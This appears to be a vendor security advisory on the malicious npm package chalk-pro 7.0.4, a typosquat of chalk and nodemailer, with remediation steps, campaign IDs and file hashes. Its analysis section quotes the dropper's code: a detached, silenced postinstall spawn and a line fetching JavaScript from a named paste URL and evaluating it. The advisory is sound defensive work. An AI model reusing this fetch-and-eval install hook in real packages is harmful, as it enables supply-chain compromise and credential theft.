Which versions of chalk-pro are malicious?

The following npm versions of chalk-pro are flagged malicious: 7.0.4. Treat any of these as compromised.

How do I remediate chalk-pro if I installed it?

Remove chalk-pro from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is chalk-pro part of a known attack campaign?

Yes — chalk-pro is associated with the IN-MAL-2026-006231, IN-MAL-2026-006232 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect chalk-pro in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking chalk-pro and packages like it before any post-install script runs.

Malicious package

chalk-pronpm

Malicious code in chalk-pro (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5711

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall chalk-pro

What this malware does

Package is published as 'chalk-pro' (homepage chalk-pro.com) but its main entry is a verbatim copy of nodemailer's API — a typosquat impersonating both chalk and nodemailer, with 'Andris Reinman' (the real nodemailer author) listed as author. The package.json postinstall hook runs node lib/utils/index.js, which uses child_process.spawn(process.execPath, [filePath], { detached: true, stdio: ['ignore','ignore','ignore'] }) followed by child.unref() to launch lib/utils/smtp-connection/index.js as a detached, fully-silenced child so npm install returns immediately while the dropper continues in the background. The dropper executes require('axios').get('https://www.jsonkeeper.com/b/TOAAK').then(r => new Function('require', r.data.cookie)(require)) — fetching attacker-controlled JavaScript from a mutable paste host and evaluating it with new Function at install time, with full access to require. A second file (lib/utils/smtp-connection/parse.js) provides AES-256-CBC decryption with a hardcoded key and IV, positioned to decrypt follow-up stages delivered as hex. This is a classic install-time dropper: typosquat lure + detached/silenced postinstall + remote eval from a mutable third-party paste + bundled second-stage decryptor.

Malicious versions

1 flagged

7.0.4

Indicators of compromise (SHA-256)

ac66dfb6013c32d34c6ce83bdba4628b67539e81df27fe18dcf71d3de05ff8ce

d6015370f610f4d4581119093958e05171cac46e967b97725e8e3ed42dad9070

Frequently asked questions

No. chalk-pro on npm has been identified as a malicious package (version 7.0.4 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006231IN-MAL-2026-006232

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection